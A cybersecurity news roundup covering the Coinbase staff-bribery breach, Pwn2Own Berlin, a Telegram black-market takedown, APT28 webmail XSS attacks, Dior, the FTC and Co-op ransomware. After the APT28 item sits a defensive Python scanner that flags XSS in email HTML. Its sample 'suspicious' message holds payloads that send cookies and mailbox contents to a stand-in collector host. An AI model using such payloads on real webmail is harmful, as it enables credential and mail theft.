Cybersecurity News: Coinbase hackers bribe staff, Windows 11 hacked at Pwn2Own, Telegram purges black market group

In today’s cybersecurity news…

Coinbase says hackers bribed staff to steal customer data and are demanding $20 million ransom

Coinbase says attackers bribed overseas customer-support agents to pull sensitive customer data, including names, contact details, partial Social Security numbers, and government ID images; no passwords, private keys, or funds were taken. Coinbase says it refused the $20 million ransom demand but estimates the breach could cost it up to $400 million to remediate, while it cooperates with law enforcement and tightens its security controls.

(CNBC)

Windows 11 and Red Hat Linux hacked on first day of Pwn2Own

On day one of Pwn2Own Berlin 2025, researchers earned $260,000 for zero-day exploits against Windows 11, Red Hat Linux, Oracle VirtualBox, and Docker Desktop. The entries included local privilege escalations and sandbox escapes built on bugs such as use-after-free and integer overflows. Vendors have 90 days to patch the flaws before they are disclosed. The competition runs through Saturday, May 17, with more than $1 million in prizes on offer.

(Bleeping Computer)

The Internet’s biggest-ever black market just shut down amid a Telegram purge

Telegram shut down Haowang Guarantee (formerly Huione Guarantee) after WIRED reported it was complicit in more than $27 billion in illicit transactions: it let crypto scammers launder money using Tether and hosted sellers of stolen data, deepfake services, and tools used by human-trafficking operations. The takedown followed research from blockchain analytics firm Elliptic, which also linked another Telegram-based market, Xinbi Guarantee, to $8.4 billion in similar activity. Telegram said the bans are in line with its terms of service, which prohibit illegal activity.

(Wired)

Kremlin-linked hackers target webmail servers of Eastern European government agencies

Russia-linked hacking group APT28 (aka Fancy Bear) has been targeting webmail servers used by Eastern European government agencies and defense firms, exploiting cross-site scripting (XSS) vulnerabilities in the webmail software to steal login credentials and read mailboxes. The spear-phishing campaign is said to have affected entities in Ukraine, Romania, Bulgaria, and other countries. Victims received emails carrying embedded malicious code, often disguised as links to news stories; in an XSS attack of this kind the script runs inside the victim's already-authenticated webmail session once the message is rendered, which is what gives it access to credentials and mail. APT28, believed to be tied to Russia's GRU, has previously exploited vulnerabilities in the Roundcube and Zimbra webmail systems.

(The Record)
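The campaign above depends on a webmail client rendering attacker-controlled HTML in a way that lets script run. The following Python script is added here as an example; it is not part of the original article or of any vendor's tooling. It pulls the text/html parts out of a raw MIME message and flags the constructs a webmail sanitizer must strip: script-capable tags, on* event handlers, and javascript: URIs, including ones hidden behind HTML character references. The two sample messages, the example.invalid hostnames, and the indicator labels are constructed for the example.

```python
import email
import email.policy
import re
from html.parser import HTMLParser

# Constructs that let HTML in an email body execute script or steer the
# session if the webmail client's sanitizer lets them through.
SCRIPT_TAGS = {"script", "iframe", "object", "embed", "svg"}
# Not script, but common in credential-harvesting mails: a form posting to
# an attacker host, a <base> that rewrites relative links, a <meta> refresh.
PHISH_TAGS = {"form", "base", "meta"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}
SCRIPT_URI = re.compile(r"^\s*(?:javascript|vbscript):", re.IGNORECASE)


class XssIndicatorScanner(HTMLParser):
    """Collects indicator labels for risky tags and attributes.

    HTMLParser lowercases tag and attribute names and decodes character
    references in attribute values, so "&#106;avascript:" is seen as
    "javascript:", the same way a browser would see it.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.indicators = []

    def handle_starttag(self, tag, attrs):
        if tag in SCRIPT_TAGS:
            self.indicators.append(f"tag:{tag}")
        elif tag in PHISH_TAGS:
            self.indicators.append(f"phish-tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):
                self.indicators.append(f"event-handler:{name}")
            elif name in URL_ATTRS and value and SCRIPT_URI.match(value):
                self.indicators.append(f"script-uri:{name}")


def find_xss_indicators(html):
    """Return the indicators found in one HTML fragment, in document order."""
    scanner = XssIndicatorScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.indicators


def scan_raw_message(raw):
    """Parse a raw RFC 5322 message and scan every text/html part."""
    msg = email.message_from_string(raw, policy=email.policy.default)
    found = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            found.extend(find_xss_indicators(part.get_content()))
    return found


# Constructed sample messages (not real captures); example.invalid is a
# reserved domain that never resolves.
BENIGN = """From: newsdesk@example.invalid
To: analyst@example.invalid
Subject: Weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Read the full story <a href="https://news.example.invalid/story">here</a>.</p>
<img src="https://news.example.invalid/logo.png" alt="logo"></body></html>
"""

SUSPICIOUS = """From: newsdesk@example.invalid
To: analyst@example.invalid
Subject: Breaking news
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Read the full story <a href="&#106;avascript:fetch('https://collector.example.invalid/?c='+document.cookie)">here</a>.</p>
<img src="x" onerror="new Image().src='https://collector.example.invalid/?m='+btoa(document.body.innerHTML)">
<svg onload="fetch('https://collector.example.invalid/?s='+location.href)"></svg>
</body></html>
"""

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_raw_message(raw))
```

This is a triage heuristic, not a sanitizer: a hit means "pull this message for review and check the webmail server's patch level", not a confirmed exploit. Real bypasses often rely on parser differentials between the server-side sanitizer and the browser, on CSS, or on control characters inside the URI scheme that this regex does not model, so the scanner is for hunting over mail logs and quarantines rather than as a gate in front of users.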

Huge thanks to our sponsor, Vanta

Do you know the status of your compliance controls right now? Like…right now? We know that real-time visibility is critical for security, but when it comes to our GRC programs…we rely on point-in-time checks.

But more than 9,000 companies have continuous visibility into their controls with Vanta. Vanta brings automation to evidence collection across over 35 frameworks, like SOC 2 and ISO 27001.

They also centralize key workflows like policies, access reviews, and reporting, and help you get security questionnaires done five times faster with AI.

Now that’s…a new way to GRC. Get started at Vanta.com/headlines.

Dior confirms data breach affecting customer information

French luxury brand Dior confirmed a data breach, discovered on May 7th, affecting customers in countries including China and South Korea and exposing names, contact details, addresses, and purchase preferences. Financial data and passwords do not appear to have been compromised. Dior says it has notified affected individuals and is investigating the incident, while South Korean authorities are reviewing the company's response.

(Infosecurity)

FTC wants a new, segregated software system to police deepfake porn

The FTC is preparing to enforce the Take It Down Act, which targets nonconsensual deepfake pornography. Chair Andrew Ferguson told Congress the agency needs more funding, a secure and segregated software system for reviewing explicit content, and specialized staff to pursue enforcement. The law requires platforms to remove such content within 48 hours of notice, which could be a challenge to enforce under current law. Controversy also continues over the US President's firing of two Democratic commissioners, raising concerns about the agency's independence and the prospect of legal challenges.

(CyberScoop)

Scientists use AI to encrypt secret messages that are invisible to cybersecurity systems

Researchers at the University of Oslo have developed EmbedderLLM, a system that hides encrypted messages inside AI-generated text so that they pass current security tooling unnoticed. The technique embeds the ciphertext in natural-sounding chatbot responses that can be sent over any messaging platform. It supports both symmetric and public-key encryption, and the authors say it resists decryption by quantum computers.

(Live Science)

‘They yanked their own plug’: How Co-op averted an even worse cyber attack

Attackers from the DragonForce cybercrime group tried to deploy ransomware at UK retailer Co-op, but the company pulled its own systems offline in response. Customer data was still stolen, but Co-op avoided a full lockout and is recovering faster than Marks & Spencer, which suffered a deeper compromise and continues to see disruption, although M&S maintains that no payment card or password details were accessed. The disruption is expensive: M&S is estimated to be losing around £43 million per week. DragonForce also claims responsibility for an attack on Harrods and uses Telegram and Discord to coordinate its activities.

(BBC)